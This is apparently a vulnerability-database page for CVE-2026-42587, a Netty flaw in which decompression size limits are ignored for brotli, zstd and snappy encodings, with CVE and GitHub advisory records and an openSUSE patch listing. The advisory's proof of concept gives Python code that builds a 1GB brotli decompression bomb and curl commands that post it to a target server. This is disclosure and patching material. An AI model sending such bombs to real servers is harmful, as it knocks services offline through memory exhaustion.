Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-42587 (GCVE-0-2026-42587)
Vulnerability from cvelistv5 – Published: 2026-05-13 18:22 – Updated: 2026-05-13 18:44
VLAI?
EPSS
Title
Netty: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables decompression bomb DoS
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
Severity ?
7.5 (High)
CWE
- CWE-400 - Uncontrolled Resource Consumption
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/netty/netty/security/advisorie… | x_refsource_CONFIRM |
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| netty | netty |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| io.netty | netty-codec-http |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| io.netty | netty-codec-http2 |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42587",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T18:43:31.138358Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T18:44:09.298Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http2",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T18:22:21.699Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"source": {
"advisory": "GHSA-f6hv-jmp6-3vwv",
"discovery": "UNKNOWN"
},
"title": "Netty: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables decompression bomb DoS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42587",
"datePublished": "2026-05-13T18:22:21.699Z",
"dateReserved": "2026-04-28T17:26:12.086Z",
"dateUpdated": "2026-05-13T18:44:09.298Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42587",
"date": "2026-05-18",
"epss": "0.00042",
"percentile": "0.12774"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42587\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T19:17:24.460\",\"lastModified\":\"2026-05-18T12:20:06.340\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.1.133\",\"matchCriteriaId\":\"DFE205A5-2C43-40C9-A2FF-CF6759B8D861\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.2.0\",\"versionEndExcluding\":\"4.2.13\",\"matchCriteriaId\":\"D94A720F-9CED-4BE9-8C37-FD9E2FD28472\"}]}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}"
}
}
GHSA-F6HV-JMP6-3VWV
Vulnerability from github – Published: 2026-05-07 00:46 – Updated: 2026-05-14 20:41
VLAI?
Summary
Netty: HttpContentDecompressor maxAllocation bypass when Content-Encoding set to br/zstd/snappy leads to decompression bomb DoS
Details
Summary
HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service.
The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections.
Details
HttpContentDecompressor stores the maxAllocation value at construction time (HttpContentDecompressor.java:89) and uses it in newContentDecoder() to create the appropriate decompression handler.
For gzip/deflate, maxAllocation is forwarded to ZlibCodecFactory.newZlibDecoder():
// HttpContentDecompressor.java:101 — maxAllocation IS enforced
.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))
ZlibDecoder.prepareDecompressBuffer() enforces this as a hard cap by setting the buffer's maxCapacity and throwing DecompressionException when the limit is reached:
// ZlibDecoder.java:68 — hard limit on buffer capacity
return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);
// ZlibDecoder.java:80 — throws when exceeded
throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity());
For brotli, zstd, and snappy, the decoders are created without any size limit:
// HttpContentDecompressor.java:120 — maxAllocation IGNORED
.handlers(new BrotliDecoder())
// HttpContentDecompressor.java:129 — maxAllocation IGNORED
.handlers(new SnappyFrameDecoder())
// HttpContentDecompressor.java:138 — maxAllocation IGNORED
.handlers(new ZstdDecoder())
BrotliDecoder has no maxAllocation parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via fireChannelRead with no total limit.
ZstdDecoder() defaults to a 4MB maximumAllocationSize, but this only constrains individual buffer allocations, not total output. The decode loop (ZstdDecoder.java:100-114) creates new buffers and fires channelRead repeatedly, so total decompressed output is unbounded.
The identical pattern exists in DelegatingDecompressorFrameListener.newContentDecompressor() at lines 188-210 for HTTP/2.
PoC
- Configure a Netty HTTP server with decompression bomb protection:
pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max
pipeline.addLast(new HttpObjectAggregator(1048576)); // 1MB max
- Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed):
import brotli
bomb = b'\x00' * (1024 * 1024 * 1024) # 1GB of zeros
compressed = brotli.compress(bomb, quality=11)
with open('bomb.br', 'wb') as f:
f.write(compressed)
# compressed size: ~1KB
- Send the bomb with gzip encoding (BLOCKED by maxAllocation):
# This is caught — ZlibDecoder enforces the 1MB limit
curl -X POST http://target:8080/api \
-H 'Content-Encoding: gzip' \
--data-binary @bomb.gz
# Result: DecompressionException thrown at 1MB
- Send the same bomb with brotli encoding (BYPASSES maxAllocation):
# This bypasses the limit — BrotliDecoder has no maxAllocation
curl -X POST http://target:8080/api \
-H 'Content-Encoding: br' \
--data-binary @bomb.br
# Result: Full 1GB decompressed into memory → OOM
- The same bypass works with
Content-Encoding: zstdandContent-Encoding: snappy.
Impact
- Denial of Service: An attacker can cause out-of-memory conditions on any Netty server that relies on
maxAllocationfor decompression bomb protection, by simply using a non-gzip content encoding. - False sense of security: Developers who explicitly configure
maxAllocationto protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered. - Trivial bypass: The attacker only needs to change one HTTP header (
Content-Encoding: brinstead ofContent-Encoding: gzip) to circumvent the protection entirely. - Both HTTP/1.1 and HTTP/2: The vulnerability exists in both
HttpContentDecompressor(HTTP/1.1) andDelegatingDecompressorFrameListener(HTTP/2).
Recommended Fix
Pass maxAllocation to all decoder constructors. For BrotliDecoder, which currently has no maxAllocation support, add the parameter:
HttpContentDecompressor.java — pass maxAllocation to all decoders:
// Line 120: BrotliDecoder — add maxAllocation support
.handlers(new BrotliDecoder(maxAllocation))
// Line 129: SnappyFrameDecoder — add maxAllocation support
.handlers(new SnappyFrameDecoder(maxAllocation))
// Line 138: ZstdDecoder — forward the configured maxAllocation
.handlers(new ZstdDecoder(maxAllocation))
DelegatingDecompressorFrameListener.java — same fix at lines 188-210.
BrotliDecoder — add maxAllocation parameter with the same semantics as ZlibDecoder.prepareDecompressBuffer(): set buffer maxCapacity and throw DecompressionException when the total decompressed output exceeds the limit.
SnappyFrameDecoder — add maxAllocation parameter with equivalent enforcement.
ZstdDecoder — ensure that when maxAllocation is set, total output across all buffers is bounded (not just per-buffer allocation size).
Severity ?
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http2"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.132.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.133.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.132.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.133.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42587"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T00:46:35Z",
"nvd_published_at": "2026-05-13T19:17:24Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encoding is `br` (Brotli), `zstd`, or `snappy`. An attacker can bypass the configured decompression limit by sending a compressed payload with `Content-Encoding: br` instead of `Content-Encoding: gzip`, causing unbounded memory allocation and out-of-memory denial of service.\n\nThe same vulnerability exists in `DelegatingDecompressorFrameListener` for HTTP/2 connections.\n\n## Details\n\n`HttpContentDecompressor` stores the `maxAllocation` value at construction time (`HttpContentDecompressor.java:89`) and uses it in `newContentDecoder()` to create the appropriate decompression handler.\n\nFor gzip/deflate, `maxAllocation` is forwarded to `ZlibCodecFactory.newZlibDecoder()`:\n\n```java\n// HttpContentDecompressor.java:101 \u2014 maxAllocation IS enforced\n.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))\n```\n\n`ZlibDecoder.prepareDecompressBuffer()` enforces this as a hard cap by setting the buffer\u0027s `maxCapacity` and throwing `DecompressionException` when the limit is reached:\n\n```java\n// ZlibDecoder.java:68 \u2014 hard limit on buffer capacity\nreturn ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);\n// ZlibDecoder.java:80 \u2014 throws when exceeded\nthrow new DecompressionException(\"Decompression buffer has reached maximum size: \" + buffer.maxCapacity());\n```\n\nFor brotli, zstd, and snappy, the decoders are created without any size limit:\n\n```java\n// HttpContentDecompressor.java:120 \u2014 maxAllocation IGNORED\n.handlers(new BrotliDecoder())\n\n// HttpContentDecompressor.java:129 \u2014 maxAllocation IGNORED\n.handlers(new SnappyFrameDecoder())\n\n// HttpContentDecompressor.java:138 \u2014 maxAllocation IGNORED\n.handlers(new ZstdDecoder())\n```\n\n`BrotliDecoder` has no `maxAllocation` parameter at all \u2014 there is no way to constrain its output. It streams decompressed data in chunks via `fireChannelRead` with no total limit.\n\n`ZstdDecoder()` defaults to a 4MB `maximumAllocationSize`, but this only constrains individual buffer allocations, not total output. The decode loop (`ZstdDecoder.java:100-114`) creates new buffers and fires `channelRead` repeatedly, so total decompressed output is unbounded.\n\nThe identical pattern exists in `DelegatingDecompressorFrameListener.newContentDecompressor()` at lines 188-210 for HTTP/2.\n\n## PoC\n\n1. Configure a Netty HTTP server with decompression bomb protection:\n\n```java\npipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max\npipeline.addLast(new HttpObjectAggregator(1048576)); // 1MB max\n```\n\n2. Generate a brotli-compressed bomb (~1KB compressed \u2192 1GB decompressed):\n\n```python\nimport brotli\nbomb = b\u0027\\x00\u0027 * (1024 * 1024 * 1024) # 1GB of zeros\ncompressed = brotli.compress(bomb, quality=11)\nwith open(\u0027bomb.br\u0027, \u0027wb\u0027) as f:\n f.write(compressed)\n# compressed size: ~1KB\n```\n\n3. Send the bomb with gzip encoding (BLOCKED by maxAllocation):\n\n```bash\n# This is caught \u2014 ZlibDecoder enforces the 1MB limit\ncurl -X POST http://target:8080/api \\\n -H \u0027Content-Encoding: gzip\u0027 \\\n --data-binary @bomb.gz\n# Result: DecompressionException thrown at 1MB\n```\n\n4. Send the same bomb with brotli encoding (BYPASSES maxAllocation):\n\n```bash\n# This bypasses the limit \u2014 BrotliDecoder has no maxAllocation\ncurl -X POST http://target:8080/api \\\n -H \u0027Content-Encoding: br\u0027 \\\n --data-binary @bomb.br\n# Result: Full 1GB decompressed into memory \u2192 OOM\n```\n\n5. The same bypass works with `Content-Encoding: zstd` and `Content-Encoding: snappy`.\n\n## Impact\n\n- **Denial of Service**: An attacker can cause out-of-memory conditions on any Netty server that relies on `maxAllocation` for decompression bomb protection, by simply using a non-gzip content encoding.\n- **False sense of security**: Developers who explicitly configure `maxAllocation` to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.\n- **Trivial bypass**: The attacker only needs to change one HTTP header (`Content-Encoding: br` instead of `Content-Encoding: gzip`) to circumvent the protection entirely.\n- **Both HTTP/1.1 and HTTP/2**: The vulnerability exists in both `HttpContentDecompressor` (HTTP/1.1) and `DelegatingDecompressorFrameListener` (HTTP/2).\n\n## Recommended Fix\n\nPass `maxAllocation` to all decoder constructors. For `BrotliDecoder`, which currently has no `maxAllocation` support, add the parameter:\n\n**HttpContentDecompressor.java** \u2014 pass maxAllocation to all decoders:\n\n```java\n// Line 120: BrotliDecoder \u2014 add maxAllocation support\n.handlers(new BrotliDecoder(maxAllocation))\n\n// Line 129: SnappyFrameDecoder \u2014 add maxAllocation support\n.handlers(new SnappyFrameDecoder(maxAllocation))\n\n// Line 138: ZstdDecoder \u2014 forward the configured maxAllocation\n.handlers(new ZstdDecoder(maxAllocation))\n```\n\n**DelegatingDecompressorFrameListener.java** \u2014 same fix at lines 188-210.\n\n**BrotliDecoder** \u2014 add `maxAllocation` parameter with the same semantics as `ZlibDecoder.prepareDecompressBuffer()`: set buffer maxCapacity and throw `DecompressionException` when the total decompressed output exceeds the limit.\n\n**SnappyFrameDecoder** \u2014 add `maxAllocation` parameter with equivalent enforcement.\n\n**ZstdDecoder** \u2014 ensure that when `maxAllocation` is set, total output across all buffers is bounded (not just per-buffer allocation size).",
"id": "GHSA-f6hv-jmp6-3vwv",
"modified": "2026-05-14T20:41:29Z",
"published": "2026-05-07T00:46:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Netty: HttpContentDecompressor maxAllocation bypass when Content-Encoding set to br/zstd/snappy leads to decompression bomb DoS"
}
OPENSUSE-SU-2026:10795-1
Vulnerability from csaf_opensuse - Published: 2026-05-16 00:00 - Updated: 2026-05-16 00:00Summary
netty-4.1.133-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: netty-4.1.133-1.1 on GA media
Description of the patch: These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10795
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
6.5 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
